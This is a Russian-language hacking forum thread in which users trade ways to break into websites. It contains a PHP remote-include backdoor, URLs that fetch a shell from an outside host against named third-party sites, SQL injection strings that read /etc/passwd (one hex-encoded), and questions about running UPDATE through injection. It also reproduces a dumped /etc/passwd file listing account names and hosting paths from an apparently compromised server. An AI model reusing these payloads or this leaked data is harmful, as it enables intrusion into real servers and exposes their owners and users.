имхо include удобнее =), да систем почти всегда отключен. <?php include($_GET['cmd']); ?> www.site.com/index.php?cmd=http://shell.ru/shell.txt
Хых,самое интересное что инклудить пытался так до того,как ты написал(дошло!:Р),но чёт не вышло.зато @system ошибок не вызвало.знач работает)
http://www.kat.kg/index.php?file=http://site.com/shell.php?cmd=ls+-la Warning: forma_2(http://site.com/shell.php?cmd=ls -la) [function.forma-2]: failed to open stream: HTTP request failed! <html> in /usr/local/www/data-dist/kat/index_rus.inc on line 397 Fatal error: forma_2() [function.require]: Failed opening required 'http://site.com/shell.php?cmd=ls -la' (include_path='.') in /usr/local/www/data-dist/kat/index_rus.inc on line 397 И чойто я хз...Какой-то НТТР запрос чтоль не прокатил?)
что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу <? phpinfo() ?>(через char()) он вырезает эти строки а точнее вырезается всё от наяала <?
Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код
ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл хотя не, грузит файл
Должно быть Code: LOAD_FILE('/etc/passwd') или LOAD_FILE("/etc/passwd") или LOAD_FILE(0x2F6574632F706173737764) Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.
PHP: fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown:/sbin: halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: gdm:x:42:42::/home/gdm: xfs:x:43:43:X Font Server:/etc/X11/fs: nobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly
кстате через иньекцию команду update можно выполнить? если да дайте плиз пример например урла с дыркой www.site.ru/script.php?id=-1+union+select+1,2/*
Задавал не таку давно вопрос, но не получил ни одного ответа. Попытаю удачу еще раз сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать? можно если на то права есть, в разделе sql inj я токо что выложил сайт с норм. правами попробуй его.
Doom123 ну например update table1 set pole1=12345; если я прально тя понял... вобщем синтаксис такой UPDATE [LOW_PRIORITY] [IGNORE] tbl_name SET col_name1=expr1 [, col_name2=expr2 ...] [WHERE where_definition] [ORDER BY ...] [LIMIT rows]
та я знаю sql я спрашиваю как это сделать через иньекцию я ж не буду писать www.site.ru/s?a=-1+update+table+set+col=1,2+where+id+like+1/*